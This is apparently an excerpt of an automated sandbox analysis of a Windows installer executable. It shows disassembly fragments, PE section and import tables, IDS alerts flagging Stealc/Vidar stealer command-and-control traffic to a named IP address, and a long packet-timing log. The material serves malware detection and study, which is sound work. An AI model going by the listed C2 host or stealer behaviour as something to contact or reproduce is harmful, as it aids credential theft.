                                                                                                                                                                                                                                                                mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                call 00007FE780B5ABB1h
                                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                                call dword ptr [00409260h]
                                                                                                                                                                                                                                                                mov esi, eax
                                                                                                                                                                                                                                                                mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                jmp 00007FE780B58863h
                                                                                                                                                                                                                                                                push 00000020h
                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                cmp ax, bx
                                                                                                                                                                                                                                                                jne 00007FE780B587DAh
                                                                                                                                                                                                                                                                add esi, 02h
                                                                                                                                                                                                                                                                cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x65f72 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x149db7 | 0x1880 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x65f72 | 0x66000 | 7de5b8fb42c8d5d71cd323b6a879fe5f | False | 0.9839992149203431 | data | 7.900101331412788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x166000 | 0xfd6 | 0x1000 | d8e7871947653afbbd38c3e3cc603bb5 | False | 0.597900390625 | data | 5.597896970571839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x100250 | 0x5a1e8 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9902256127955614
RT_ICON | 0x15a438 | 0x7ae4 | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 1.000508582326764
RT_ICON | 0x161f1c | 0x2527 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.001156555567238
RT_ICON | 0x164444 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.6086065573770492
RT_ICON | 0x16556c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.74822695035461
RT_DIALOG | 0x1659d4 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x165ad4 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x165bf0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x165c50 | 0x4c | data | English | United States | 0.8157894736842105
RT_MANIFEST | 0x165c9c | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-16T13:46:47.571950+0100 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.8 | 49715 | 116.203.12.114 | 443 | TCP
2024-12-16T13:46:49.869743+0100 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 116.203.12.114 | 443 | 192.168.2.8 | 49716 | TCP
2024-12-16T13:46:52.157474+0100 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 116.203.12.114 | 443 | 192.168.2.8 | 49718 | TCP
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:48.977498055 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.066750050 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.066783905 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.068391085 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.068396091 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869554043 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869585037 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869642019 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869640112 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869669914 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.869719028 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.870218992 CET49716443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.870239019 CET44349716116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.871972084 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.871999025 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.872062922 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.872282028 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:49.872292042 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.271939993 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.272094965 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.272665977 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.272676945 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.274333954 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:51.274338961 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157284975 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157371044 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157402992 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157438040 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157723904 CET49718443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.157747984 CET44349718116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.176980972 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177035093 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177110910 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177350998 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:52.177365065 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.172796965 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.172849894 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.172944069 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.173217058 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.173229933 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.579058886 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.580113888 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.580518961 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.580527067 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582319975 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582324982 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582406044 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:53.582422018 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563148022 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563231945 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563287973 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.563330889 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.567503929 CET49719443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.567524910 CET44349719116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.582560062 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.582665920 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.583074093 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.583086014 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.584793091 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:54.584803104 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571279049 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571346045 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571368933 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571386099 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571405888 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.571429014 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.618233919 CET49720443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.618267059 CET44349720116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.924289942 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.924314976 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.924634933 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.925352097 CET49724443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.925362110 CET44349724142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483459949 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483504057 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483571053 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483795881 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.483807087 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.552582026 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.552625895 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.552791119 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.553148985 CET49728443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.553163052 CET44349728142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.679764986 CET49729443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:56.679817915 CET44349729142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.373086929 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.373095989 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.382525921 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.382580996 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.382590055 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.422988892 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.439382076 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.449645996 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.449724913 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.449749947 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.459672928 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.459708929 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.459733963 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.459757090 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.459877968 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.473531008 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.486417055 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.486476898 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.486491919 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.486509085 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.488415956 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.498716116 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.510107040 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.510173082 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.510181904 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.510200977 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.510251999 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.521537066 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.531964064 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.532025099 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.532053947 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.532085896 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.532166958 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.542447090 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.551969051 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.552030087 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.552058935 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.558650017 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.558701992 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.558712959 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.565502882 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.565553904 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.565562963 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.572072029 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.572117090 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.572143078 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.579051018 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.579109907 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.579132080 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.585746050 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.585784912 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.585817099 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.585834026 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.585876942 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.593976974 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.599150896 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.599204063 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.599231958 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.606158018 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.606206894 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.606220961 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.607661009 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.607856989 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.607867956 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.614402056 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.614460945 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.614471912 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.621126890 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.621177912 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.621200085 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.627814054 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.627861977 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.627881050 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.633958101 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.634001017 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.634011030 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.640172005 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.640219927 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.640228987 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.646583080 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.646644115 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.646653891 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.653053999 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.653100014 CET49727443192.168.2.8142.250.181.68
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:59.653107882 CET44349727142.250.181.68192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:06.723261118 CET49743443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:06.723273993 CET44349743116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.536133051 CET44349742116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.536212921 CET49742443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.536216974 CET44349742116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.536492109 CET49742443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.537170887 CET49742443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.537194014 CET44349742116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.726499081 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.726547956 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.726650000 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.726985931 CET49744443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:07.726996899 CET44349744116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:08.120780945 CET44349743116.203.12.114192.168.2.8
